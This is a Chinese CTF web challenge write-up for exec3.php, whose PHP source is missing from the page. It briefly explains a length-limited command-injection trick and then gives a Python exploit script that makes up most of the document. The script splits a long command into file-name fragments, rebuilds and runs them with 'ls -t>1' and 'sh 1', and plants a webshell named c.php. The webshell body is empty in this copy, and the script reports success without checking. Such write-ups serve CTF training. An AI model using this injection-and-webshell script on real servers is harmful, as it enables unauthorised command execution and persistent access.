[CTF_web]exec/exec3.php




源码如下（注：本页抓取到的 exec3.php 源码内容缺失，下面的分析只能依据利用脚本本身）:



分析

这个 challenge 如果要写入一个 webshell，必须要求 PHP 进程对当前目录有写权限。
从利用脚本可以看出，单次能执行的命令长度上限非常短（脚本中 max_length 为 7），因此脚本把长命令拆成若干片段，以 `>片段\\` 的形式把每个片段写成文件名（文件名末尾保留一个反斜杠作为换行续行符），再用 `ls -t>1` 按创建时间顺序把文件名拼成脚本，最后用 `sh 1` 执行；片段按倒序发送，这样 `ls -t`（最新的在前）列出的顺序正好是原命令的顺序。
下面给出利用脚本：

利用代码 :

#!/usr/bin/env python
# encoding: utf-8

import requests
import base64

# Target endpoint (a local lab instance) and the name of the GET parameter
# the page hands to the system shell.
# NOTE(review): the PHP source is not part of this page, so the parameter
# name `c` is taken from the script as-is; confirm against exec3.php.
# Only run this against systems you are authorised to test.
url = "http://127.0.0.1/CTF_web/exec/exec3.php"
arg = "c"

def add_slashes(cmd):
    """Backslash-escape shell metacharacters in *cmd* for the ``>filename`` trick.

    Each character in the table below is prefixed with a single backslash, in
    table order.  The order is significant: the dot is escaped *before* the
    backslash itself, so every dot ends up preceded by two backslashes, while
    each later character gets exactly one.  NOTE(review): the extra level on
    the dot is presumably there so that a chunk starting with ``.`` still
    produces a visible (non dot-prefixed) filename that ``ls -t`` lists -- the
    challenge source is not on this page, so confirm against it.

    :param cmd: raw shell command fragment
    :return: escaped copy of *cmd*; the empty string comes back unchanged
    """
    # Order matters -- see the docstring.  Dot first, then backslash, then the rest.
    specials = ".\\/|&-<># ="
    escaped = cmd
    for ch in specials:
        escaped = escaped.replace(ch, "\\" + ch)
    return escaped

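def exec_cmd(cmd, max_length):
    """Run *cmd* through the length-limited command-injection point.

    The page accepts at most ``max_length`` characters per request, so a long
    command is smuggled in pieces: each piece is created on disk as a *file
    name* (``>piece`` followed by an escaped backslash), ``ls -t>1`` then
    concatenates the names newest-first into ``1``, and ``sh 1`` executes the
    reassembled script.  The trailing backslash on every piece is a shell line
    continuation; the pieces are sent in reverse so ``ls -t`` lists them in
    the original order.

    Fixes versus the original: the short-command path referenced an undefined
    name ``c`` (NameError) instead of ``arg``; the query parameter is now sent
    via ``params=`` so that ``+``, ``&`` and ``#`` in a payload (e.g. base64)
    are percent-encoded instead of being reinterpreted by PHP; an empty
    trailing piece is no longer sent as a bare ``>``.

    :param cmd: command to execute; escaped here with :func:`add_slashes`
    :param max_length: maximum request length the target accepts
    :return: the command output when *cmd* fits in one request (the page's
             surrounding HTML is removed by a fixed-size slice), ``None``
             otherwise
    """
    print("[+] cmd : %s" % (cmd))
    cmd = add_slashes(cmd)
    print("[+] Full cmd : %s" % (cmd))
    if len(cmd) < max_length:
        # NOTE(review): the slice drops a fixed-size HTML trailer specific to
        # this page -- adjust if the target's template changes.
        return requests.get(url, params={arg: cmd}).text[:-1135 - 57]

    # Room left per piece once the leading ">" and the trailing "\\" are paid for.
    every_length = max_length - len(">") - len("\\\\")
    times = len(cmd) // every_length  # integer division, same result on Python 2 and 3
    # Never split an escape pair across two pieces: if a piece would end on a
    # lone backslash, insert another so the pair stays intact (the surplus is
    # folded away again when the piece is built below).
    for i in range(1, times + 1, 1):
        index = i * every_length - 1
        if cmd[index] == "\\":
            cmd = cmd[0:index] + "\\" + cmd[index:]

    cmds = []
    for i in range(times):
        every = cmd[every_length * i:every_length * (i+1)]
        true_cmd = ">%s\\\\" % (every)
        cmds.append(true_cmd.replace("\\\\\\", "\\\\"))
    end_cmd = ">%s" % (cmd[times * every_length:])
    if len(end_cmd) == 1:
        # Nothing left over: the last real piece must not end with a
        # continuation, and a bare ">" would only be a shell syntax error.
        cmds[-1] = cmds[-1][0:-2]
    else:
        cmds.append(end_cmd)
    # Reverse order so that `ls -t` (newest first) reproduces the command.
    for piece in cmds[::-1]:
        print("[+] Sending : %s=%s" % (arg, piece))
        requests.get(url, params={arg: piece})
    requests.get(url, params={arg: "ls -t>1"})
    requests.get(url, params={arg: "sh 1"})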

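# Stage the payload: write it base64-encoded into scratch file `6`, then
# decode it into `c.php` next to exec3.php.  Both commands exceed the
# 7-character budget and are therefore chunked by exec_cmd().
# NOTE(review): the webshell body is the empty string in this copy of the
# script -- the page extraction appears to have dropped the PHP one-liner
# (the "password : c" line below suggests a shell that reads a parameter
# named `c`).  As written, c.php is created empty; supply the payload here.
exec_cmd("echo %s>6" % (base64.b64encode("")), 7)
exec_cmd("cat 6|base64 -d>c.php", 7)
# c.php lands in the directory that holds exec3.php; the original appended
# "c.php" directly to the script URL and printed ".../exec3.phpc.php".
shell_url = url.rsplit("/", 1)[0] + "/c.php"
print("[%s]" % ("-" * 64))
print("[+] Upload webshell successful!")
print("[+] Webshell is stored at : %s" % (shell_url))
print("[+] password : c")
print("[%s]" % ("-" * 64))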
